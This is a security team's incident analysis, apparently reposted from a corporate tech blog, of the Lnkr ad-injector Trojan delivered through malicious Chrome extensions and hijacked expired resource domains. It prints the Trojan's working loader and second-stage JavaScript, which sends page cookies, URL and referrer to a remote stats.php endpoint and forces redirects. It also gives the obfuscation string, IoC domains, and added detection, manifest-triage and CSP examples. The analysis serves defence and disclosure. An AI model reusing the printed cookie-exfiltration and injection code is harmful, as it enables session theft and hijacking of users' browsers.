The "black hands" hidden behind the browser


This article analyzes the Lnkr Trojan from three angles: the attack methods of the criminal ("black production") operators behind it, the malicious behavior of the Trojan itself, and monitoring and defense schemes. This type of Trojan has a wide reach and varied attack methods, yet domestic information about it is scarce. We hope the practical experience and summary in this article are useful to readers engaged in related security testing.


1. Event overview

In October 2020, the Meituan security operations platform detected malicious JavaScript requests in network traffic. The Information Security Department began emergency handling as soon as the alert was received. By investigating the network environment, access logs and other evidence, the malicious requests were traced to a malicious plug-in installed in the Chrome browser. The malicious JavaScript file steals cookies and forces users to redirect to pornographic sites, promotion links and the like. Combined with Meituan's threat-intelligence data, the plug-in was found to match the characteristics of the Lnkr Ad Injector Trojan.

This type of Trojan spreads in several ways. Malicious code is implanted into pages through browser plug-ins, Broken Link Hijacking and other means, which not only seriously disrupts normal user access but also steals user data. Tracking analysis found that many large domestic Internet sites (ranked in the global Alexa top 600) were infected, affecting the online security of hundreds of millions of users. Major platforms are advised to check the third-party loading sources of their systems and of internal terminal devices to avoid this kind of Trojan attack.

2. Traceability process

2.1 The security operation platform issues an abnormal alarm

The Chrome sandbox detected malicious JavaScript files and issued an abnormal warning:

The attack chain inferred from the alarm information is:

  1. The user visits the normal page;

  2. The page loads an external JavaScript file (A): http://s3.amazonaws.com/js-static/18ced489204f8ff908.js;

  3. A loads the second JavaScript file (B): http://countsource.cool/18ced489204f8ff908.js;

  4. B contains malicious code and sends sensitive information such as cookies to a remote domain.

2.2 Analyze the attack path

Based on the triggering page and the related network environment from the alarm, traffic hijacking, XSS attacks and similar causes were ruled out, and a browser plug-in or malware was suspected.

Sandbox analysis of every Chrome plug-in on the affected device found that the code of a Chrome plug-in named Vysor exhibited malicious behavior. The detection results are as follows:

{
    "call_window_location": {
        "info": "get document.location",
        "capture": []
    },
    "call_document_createElement": {
        "info": "call document.createElement, create script element",
        "capture": [
            "create element elementName:FIELDSET",
            "create element elementName:FIELDSET",
            "create element elementName:FIELDSET",
            "create element elementName:FIELDSET",
            "create element elementName:FIELDSET",
            "create element elementName:INPUT",
            "create element elementName:FIELDSET",
            "create element elementName:FIELDSET",
            "create element elementName:FIELDSET",
            "create element elementName:FIELDSET",
            "create element elementName:FIELDSET",
            "create element elementName:SCRIPT",
            "create element elementName:LINK"
        ]
    },
    "call_document_removeChild": {
        "info": "call document.removeChild",
        "capture": [
            "remove element {elementName:fieldset}",
            "remove element {elementName:fieldset}",
            "remove element {elementName:fieldset}"
        ]
    },
    "set_scriptSrcValue": {
        "info": "set script src unsafe value",
        "capture": [
            "//s3.amazonaws.com/js-static/18ced489204f8ff908.js"
        ]
    }
}

The plug-in code creates a script tag and then sets its src attribute to //s3.amazonaws.com/js-static/18ced489204f8ff908.js.

2.3 Malicious code analysis of plugins

To study the characteristics of this group's Trojan further, we manually analyzed the malicious plug-in's code. The plug-in contains a large amount of code with a messy structure and a great deal of interfering junk code.

First, the malicious code pre-defines many strings with no obvious meaning that are used to construct the payload.

Through a series of conversions in the methods below, these strings are finally assembled into a document['createElement'] call that creates a script tag; the variable doctype holds the created script object.

Next, the src attribute of the script object is assigned. In the addHandler method, the cl parameter is passed in from elem and contains the src string; the keyword src is obtained through cl[0].split('>').slice(2, 3), and tag is the doctype variable mentioned above, that is, the script object. In the part that constructs the src value, one of the constants contains a string that looks like base64:

mawaid = '^\\%|PCQxPjwkMT5zM|y5hbWF6b25hd3Mu|?:^[^\\\\]+?:\\%\\.*\t'

The malicious code combines this string with other preset variables through a series of conversions to finally form the base64-encoded load address PCQxPjwkMT5zMy5hbWF6b25hd3MuY29tPCQxPmpzLXN0YXRpYzwkMT4xOGNlZDQ4OTIwNGY4ZmY5MDguanM:

The createLinkPseudo method base64-decodes it and, after a replacement step, produces the malicious address //s3.amazonaws.com/js-static/18ced489204f8ff908.js.
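The following script is an added example for reversing this last obfuscation layer; it is not code from the article or from the plug-in. The base64 string is the one quoted above. Decoding it shows that the placeholder token <$1> stands in for the path separator, so the "replacement" the article mentions is assumed here to be <$1> -> /; the helper names are the author's own.

```javascript
// Added example: recover the loader URL hidden in the plug-in's base64 constant.
// The encoded string is the one quoted in section 2.3 of the article.
const ENCODED_LOADER = 'PCQxPjwkMT5zMy5hbWF6b25hd3MuY29tPCQxPmpzLXN0YXRpYzwkMT4xOGNlZDQ4OTIwNGY4ZmY5MDguanM';

// Base64-decode a (possibly unpadded) string to UTF-8 text.
// Node's Buffer tolerates the missing '=' padding used by the malware.
function decodeBase64(s) {
  return Buffer.from(s, 'base64').toString('utf8');
}

// Recover the script URL: decode, then swap the "<$1>" placeholder for "/".
// The placeholder rule is an assumption inferred from the decoded text.
function recoverLoaderUrl(encoded) {
  const decoded = decodeBase64(encoded);
  return decoded.split('<$1>').join('/');
}

// Split the protocol-relative URL into host and path for use as indicators.
function loaderIndicators(encoded) {
  const url = recoverLoaderUrl(encoded);
  const m = /^\/\/([^/]+)(\/.*)$/.exec(url);
  if (!m) return null;
  return { host: m[1], path: m[2] };
}

console.log(decodeBase64(ENCODED_LOADER));      // placeholders still present
console.log(recoverLoaderUrl(ENCODED_LOADER));  // //s3.amazonaws.com/js-static/18ced489204f8ff908.js
console.log(loaderIndicators(ENCODED_LOADER));
```

The intermediate decoded string is worth keeping in an analysis note: a search for the literal token <$1> in other extension bundles is a cheap way to spot the same packer without reproducing the whole conversion chain.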

The main purpose of s3.amazonaws.com/js-static/18ced489204f8ff908.js is to load the next-stage malicious JavaScript file (//countsource.cool/18ced489204f8ff908.js). Its code is as follows:

(function(){var a=document.createElement("script");a.src="//countsource.cool/18ced489204f8ff908.js";(document.head||document.documentElement).appendChild(a)})();;

The content of //countsource.cool/18ced489204f8ff908.js is:

(function () {
    function initXMLhttp() {
        var xmlhttp;
        if (window.XMLHttpRequest) {
            xmlhttp = new XMLHttpRequest();
        } else {
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        return xmlhttp;
    }

    function minAjax(config) {
        if (!config.url) {
            return;
        }
        if (!config.type) {
            return;
        }
        if (!config.method) {
            config.method = true;
        }
        if (!config.debugLog) {
            config.debugLog = false;
        }
        var sendString = [],
            sendData = config.data;
        if (typeof sendData === "string") {
            var tmpArr = String.prototype.split.call(sendData, '&');
            for (var i = 0, j = tmpArr.length; i < j; i++) {
                var datum = tmpArr[i].split('=');
                sendString.push(encodeURIComponent(datum[0]) + "=" + encodeURIComponent(datum[1]));
            }
        } else if (typeof sendData === 'object' && !(sendData instanceof String)) {
            for (var k in sendData) {
                var datum = sendData[k];
                if (Object.prototype.toString.call(datum) == "[object Array]") {
                    for (var i = 0, j = datum.length; i < j; i++) {
                        sendString.push(encodeURIComponent(k) + "[]=" + encodeURIComponent(datum[i]));
                    }
                } else {
                    sendString.push(encodeURIComponent(k) + "=" + encodeURIComponent(datum));
                }
            }
        }
        sendString = sendString.join('&');
        if (window.XDomainRequest) {
            var xmlhttp = new window.XDomainRequest();
            xmlhttp.onload = function () {
                if (config.success) {
                    config.success(xmlhttp.responseText);
                }
            };
            xmlhttp.open("POST", config.url);
            xmlhttp.send(sendString);
        } else {
            var xmlhttp = initXMLhttp();
            xmlhttp.onreadystatechange = function () {
                if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
                    if (config.success) {
                        config.success(xmlhttp.responseText, xmlhttp.readyState);
                    }
                } else {}
            }
            if (config.type == "GET") {
                xmlhttp.open("GET", config.url + "?" + sendString, config.method);
                xmlhttp.send();
            }
            if (config.type == "POST") {
                xmlhttp.open("POST", config.url, config.method);
                xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                xmlhttp.send(sendString);
            }
        }
    }
    dL();

    function dL() {
        var host = 'http://press.cdncontentdelivery.com/f';
        var config = {
            url: host + "/stats.php",
            type: "POST",
            data: {
                vbase: document.baseURI,
                vhref: location.href,
                vref: document.referrer,
                k: "Y291bnRzb3VyY2UuY29vbA==",
                ck: document.cookie,
                t: Math.floor(new Date().getTime() / 1000),
                tg: ""
            },
            success: onSuccessCallback
        };

        function bl(resp) {
            ! function (dr) {
                function t() {
                    return !!localStorage && localStorage.getItem(a)
                }

                function e() {
                    o(),
                        parent.top.window.location.href = c
                }

                function o() {
                    var t = r + i;
                    if (localStorage) {
                        localStorage.setItem(a, t)
                    }
                }

                function n() {
                    if (t()) {
                        var o = localStorage && localStorage.getItem(a);
                        r > o && e()
                    } else e()
                }
                var a = "MenuIdentifier",
                    r = Math.floor((new Date).getTime() / 1e3),
                    c = dr,
                    i = 86400;
                n()
            }(resp);
        }

        function onSuccessCallback(response) {
            if (response && response.indexOf('http') > -1) {
                bl(response);
            }
        }
        minAjax(config);
    }
})();

This file is the code that actually carries out the malicious behavior. It is not obfuscated or encrypted and contains no meaningless filler code to hinder analysis, so the malicious behavior is plain to see:

  1. Read the current page's cookies (the ck parameter);

  2. Read the current page's Referrer (vref);

  3. Read the current page's Location (vhref, together with document.baseURI as vbase);

  4. Send the collected data via XMLHttpRequest to http://press.cdncontentdelivery.com/f/stats.php;

  5. Use the onSuccessCallback method to redirect the page.

At this point the cookie has been sent to the remote receiving address; the response content is then passed to onSuccessCallback, which completes the redirect. The complete process:
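As an added example (not from the article), the detector below turns the beacon described above into a network-layer rule: it parses one request record as a proxy or CSP-monitoring system might store it and flags the Lnkr exfiltration shape. The request shape (POST to stats.php with the fields vbase/vhref/vref/k/ck/t/tg) and the receiver domains come from the article; the record itself, the intranet page and the cookie values are constructed, and the function names are the author's.

```javascript
// Added example: flag the cookie-exfiltration beacon from section 2.3.
// The sample record is constructed, not captured traffic.
const SAMPLE_RECORD = {
  method: 'POST',
  url: 'http://press.cdncontentdelivery.com/f/stats.php',
  contentType: 'application/x-www-form-urlencoded',
  body: 'vbase=https%3A%2F%2Fintranet.example%2Forders&vhref=https%3A%2F%2Fintranet.example%2Forders' +
        '&vref=&k=Y291bnRzb3VyY2UuY29vbA%3D%3D&ck=sessionid%3Dabc123%3B%20csrftoken%3Dxyz&t=1602460800&tg=',
};

// Receiver domains the article lists under "Domain name for receiving cookies".
const COOKIE_RECEIVERS = ['cdngateway.net', 'sslproviders.net', 'cdncontentdelivery.com'];

// Fields the beacon always carries: ck is document.cookie, k is a base64 campaign key.
const BEACON_FIELDS = ['vbase', 'vhref', 'vref', 'k', 'ck', 't'];

function hostOf(url) {
  return new URL(url).hostname;
}

// True when host equals the domain or is a subdomain of it.
function matchesDomain(host, domain) {
  return host === domain || host.endsWith('.' + domain);
}

function parseForm(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Classify one request record. Returns null for traffic that neither goes to a
// known receiver nor has the beacon shape; otherwise a finding for the SOC.
function detectLnkrBeacon(rec) {
  if (rec.method !== 'POST' || !rec.contentType.startsWith('application/x-www-form-urlencoded')) return null;
  const host = hostOf(rec.url);
  const fields = parseForm(rec.body);
  const hasShape = BEACON_FIELDS.every((f) => f in fields);
  const toReceiver = COOKIE_RECEIVERS.some((d) => matchesDomain(host, d));
  if (!hasShape && !toReceiver) return null;
  // Count cookie pairs in ck so the finding says how much session material leaked.
  const cookiesExposed = fields.ck ? fields.ck.split(';').filter((c) => c.includes('=')).length : 0;
  // In the captured sample k decodes to the loader domain (countsource.cool).
  const loaderDomain = fields.k ? Buffer.from(fields.k, 'base64').toString('utf8') : null;
  return {
    receiver: host,
    knownReceiver: toReceiver,
    beaconShape: hasShape,
    loaderDomain,
    cookiesExposed,
    victimPage: fields.vhref || null,
  };
}

console.log(detectLnkrBeacon(SAMPLE_RECORD));
```

Matching on the field shape as well as the receiver list matters because the receiver domains rotate (section 3.1 lists three) while the stats.php parameter names stayed constant across the samples in the article. On the endpoint side, the redirect throttle in the second-stage code leaves a localStorage key named MenuIdentifier holding a Unix timestamp, which is a useful artifact when confirming that a browser was redirected.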

2.4 In-depth investigation through discovered IoC

Using the above characteristics, a large number of domain names and plug-ins related to the Lnkr Trojan were discovered, some of which did not appear in known threat intelligence. Further analysis found that mobile devices also triggered the malicious requests.

In addition, we found that many large domestic sites load the Lnkr Trojan through resources they reference themselves. When users visit these sites, their cookies are sent directly to the remote site, which is a high security risk. Given that the malicious resources are referenced by the sites themselves, the most likely explanation is that an attacker used Broken Link Hijacking: an expired domain name was pre-emptively registered, so that when the site loads the original resource it is hijacked to a malicious one.

3. Summary

3.1 Malicious domain name

The following lists the malicious domains found in this detection:

  1. mirextpro.com

  2. browfileext.com

  3. nextextlink.com

  4. lisegreen.biz

  5. makesure.biz

  6. clipsold.com

  7. comtakelink.xyz

  8. protesidenext.com

  9. promfflinkdev.com

  10. rayanplug.xyz

  11. countsource.cool

  12. blancfox.com

  13. skipush1.bbn.com.cn

  14. donewrork.org

  15. loungesrc.net

  16. higedev.cool

  17. s3.amazonaws.com/cashe-js/

  18. s3.amazonaws.com/js-cache/

  19. s3.amazonaws.com/jsfile/

  20. s3.amazonaws.com/cashe-js/

  21. cdngateway.net (Domain name for receiving cookies)

  22. sslproviders.net (Domain name for receiving cookies)

  23. cdncontentdelivery.com (Domain name for receiving cookies)

3.2 Malicious plug-ins

Malicious plug-ins with the characteristics of Lnkr Trojan horse were detected:

Screenshot of some malicious plugins:

4. Review

What are the hazards caused by the Lnkr Trojan?

cdngateway.net, one of the core domains of the Lnkr Trojan, ranks 8900 in global domain traffic, and 65.48% of its traffic comes from redirects from external websites. Its attack reach is therefore extremely wide, and the number of affected applications and users is very large.

This type of Trojan can cause serious harm to both external users and internal employees.

For external users: if a company does not strictly control the third-party resources loaded by its systems, attackers can use Broken Link Hijacking so that the business system is hijacked and implanted with malicious code when it loads those resources, seriously affecting user experience, information security and the corporate image.

For internal employees: traditional anti-virus, EDR and other endpoint security products do not identify such malicious plug-ins well. Attackers use malicious browser plug-ins to make employees' browsers load remote malicious resources, and not only for ad injection. Compared with other attacks against browsers, this method is more stable and can trigger a wider range of sensitive-information theft, intranet reconnaissance and so on. Among the malicious requests historically blocked by CSP, we also found cases where, in addition to cookies, malicious code stole page text; on an enterprise's internal platforms that text is likely to contain large amounts of sensitive information such as user and order data.

How to find such malicious Trojan horse implants?

For malicious browser plug-ins, static analysis of the code is a relatively expensive detection method: the payload that triggers the malicious request is built through many encoding conversions, string splicing and regular-expression matches, passing through many methods that have no real purpose. For dynamic analysis, because Chrome plug-in code calls Chrome's background APIs, those calls may be unavailable in an ordinary sandbox environment and the code may exit with an error midway. The analysis also found that many malicious behaviors only enter the payload-construction path after specific events fire, such as chrome.tabs.onUpdated.

For browser plug-in security, you can detect and protect it in the following ways:

  • Prohibit installing plug-ins that are not published in the Chrome Web Store (except plug-ins developed in-house);

  • Perform a lightweight review of the plug-in's manifest.json file; the permissions declared there can be quite sensitive, for example cookies, tabs and webRequest;

  • Use Content Security Policy (CSP) to block or monitor requests initiated by application pages, and combine static and dynamic analysis to determine what a JavaScript file does;

  • Scan browser plug-ins regularly with a browser sandbox and EDR;

  • Build detection capability at the network layer and handle malicious requests promptly when they are found.
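The lightweight manifest review from the list above can be scripted; the triage function below is an added example, not tooling from the article or from Meituan. The sensitive permissions it looks for (cookies, tabs, webRequest) are the ones the article names; treating broad host patterns such as <all_urls> and content scripts that match every site as sensitive is an addition made here, because that is the capability the injected script tag in section 2.2 relied on. The manifest is constructed and the function names are the author's.

```javascript
// Added example: score an extension's manifest.json by the permissions that
// enable the behaviour seen in this article. Sample manifest is constructed.
const SENSITIVE_PERMISSIONS = {
  cookies: 'chrome.cookies can read cookies, including HttpOnly ones, for matching hosts',
  tabs: 'can observe tab URLs and react to navigations (e.g. chrome.tabs.onUpdated)',
  webRequest: 'can observe or modify in-flight HTTP requests',
};

// Host patterns that grant access to every site the user visits (assumption).
const BROAD_HOSTS = ['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*'];

function triageManifest(manifest) {
  // Manifest V2 lists host patterns in "permissions"; V3 moves them to "host_permissions".
  const declared = [].concat(manifest.permissions || [], manifest.host_permissions || []);
  const sensitive = declared.filter((p) => Object.prototype.hasOwnProperty.call(SENSITIVE_PERMISSIONS, p));
  const broadHosts = declared.filter((p) => BROAD_HOSTS.includes(p));
  // Content scripts on every site are the usual vehicle for injecting a script tag.
  const contentScriptHosts = (manifest.content_scripts || [])
    .flatMap((cs) => cs.matches || [])
    .filter((m) => BROAD_HOSTS.includes(m));

  const reasons = sensitive.map((p) => `${p}: ${SENSITIVE_PERMISSIONS[p]}`);
  if (broadHosts.length) reasons.push(`broad host access: ${broadHosts.join(', ')}`);
  if (contentScriptHosts.length) reasons.push(`content script on all sites: ${contentScriptHosts.join(', ')}`);

  return {
    name: manifest.name,
    score: reasons.length,
    // A content script on all sites can inject remote script that reads document.cookie
    // (the path taken by the plug-in in section 2.3), no cookies permission needed.
    canInjectEverywhere: contentScriptHosts.length > 0,
    // cookies + broad host access reaches HttpOnly cookies as well.
    canReadAllCookies: sensitive.includes('cookies') && broadHosts.length > 0,
    reasons,
  };
}

// Constructed sample manifest showing the dangerous combination.
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  name: 'constructed-sample-extension',
  permissions: ['cookies', 'tabs', 'storage', '<all_urls>'],
  content_scripts: [{ matches: ['<all_urls>'], js: ['inject.js'] }],
};

console.log(triageManifest(SAMPLE_MANIFEST));
```

A non-zero score is a reason to look, not a verdict: many legitimate extensions need tabs or a broad host pattern. The useful output for an inventory sweep is the two boolean capabilities, which separate extensions that merely could misbehave from those that have the exact reach the Lnkr plug-in used.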

Regarding whether the business system itself loads malicious resources:

  • Strictly control the third-party resources loaded by the system;

  • Use Content Security Policy (CSP) to block or monitor the requests triggered by the page.
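The "monitor" half of the CSP advice above is where the indicators from section 3.1 become actionable. The code below is an added example, not part of the article: buildCspHeader() emits a report-only script allow-list for a site that expects scripts only from itself and one named CDN (the CDN host and report path are assumptions), and classifyCspReport() matches a browser's violation report against the article's domain and S3-prefix indicators. The report object is constructed in the JSON shape browsers send to a report-uri endpoint.

```javascript
// Added example: CSP report-only header plus IoC matching on violation reports.
// Indicators are from section 3.1 of the article; the report is constructed.
const IOC_DOMAINS = [
  'mirextpro.com', 'browfileext.com', 'nextextlink.com', 'lisegreen.biz', 'makesure.biz',
  'clipsold.com', 'comtakelink.xyz', 'protesidenext.com', 'promfflinkdev.com', 'rayanplug.xyz',
  'countsource.cool', 'blancfox.com', 'skipush1.bbn.com.cn', 'donewrork.org', 'loungesrc.net',
  'higedev.cool', 'cdngateway.net', 'sslproviders.net', 'cdncontentdelivery.com',
];
// Shared-host indicators must be matched on host and path prefix together.
const IOC_PATH_PREFIXES = [
  { host: 's3.amazonaws.com', prefix: '/cashe-js/' },
  { host: 's3.amazonaws.com', prefix: '/js-cache/' },
  { host: 's3.amazonaws.com', prefix: '/jsfile/' },
  { host: 's3.amazonaws.com', prefix: '/js-static/' }, // loader path observed in section 2.1
];

// Report-Only first: it logs violations without breaking pages, so the
// allow-list can be tuned before switching to the enforcing header name.
function buildCspHeader(trustedCdn, reportPath) {
  return {
    name: 'Content-Security-Policy-Report-Only',
    value: `default-src 'self'; script-src 'self' ${trustedCdn}; connect-src 'self'; report-uri ${reportPath}`,
  };
}

// Match a blocked-uri against the indicator lists. Non-URL values such as
// "inline" or "eval" are not indicators and return null.
function matchIoc(blockedUri) {
  let u;
  try { u = new URL(blockedUri); } catch (e) { return null; }
  const host = u.hostname;
  const domain = IOC_DOMAINS.find((d) => host === d || host.endsWith('.' + d));
  if (domain) return { kind: 'domain', indicator: domain };
  // Some browsers reduce a cross-origin blocked-uri to its origin, so a
  // path-prefix indicator may need server-side access logs to confirm.
  const pfx = IOC_PATH_PREFIXES.find((p) => host === p.host && u.pathname.startsWith(p.prefix));
  if (pfx) return { kind: 'path', indicator: pfx.host + pfx.prefix };
  return null;
}

function classifyCspReport(report) {
  const r = report['csp-report'] || {};
  const blocked = r['blocked-uri'] || '';
  const match = matchIoc(blocked);
  return {
    page: r['document-uri'],
    directive: r['effective-directive'] || r['violated-directive'],
    blockedUri: blocked,
    severity: match ? 'high' : 'info',
    match,
  };
}

// Constructed report: what a browser would send when the second-stage loader is blocked.
const SAMPLE_REPORT = {
  'csp-report': {
    'document-uri': 'https://intranet.example/orders',
    'violated-directive': 'script-src',
    'effective-directive': 'script-src',
    'blocked-uri': 'http://countsource.cool/18ced489204f8ff908.js',
  },
};

console.log(buildCspHeader('https://static.example', '/csp-report'));
console.log(classifyCspReport(SAMPLE_REPORT));
```

Reports rated info still matter: a steady stream of unknown hosts in script-src violations is exactly how a Broken Link Hijacking case in the site's own resources (section 2.4) first shows up, before the new domain is in any indicator list.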

Summary

Criminal ("black production") organizations use this type of Trojan to drive malicious traffic and steal user information, which puts users' access at risk and damages the company's own image. Although HTTPS eliminates the risk of users' traffic being hijacked on the wire, the security of the user's own access environment is uncertain; to ensure that the information users receive is reliable and has not been tampered with, further protection is still needed. We hope this article brings you some help or inspiration.


Origin blog.csdn.net/MeituanTech/article/details/111659188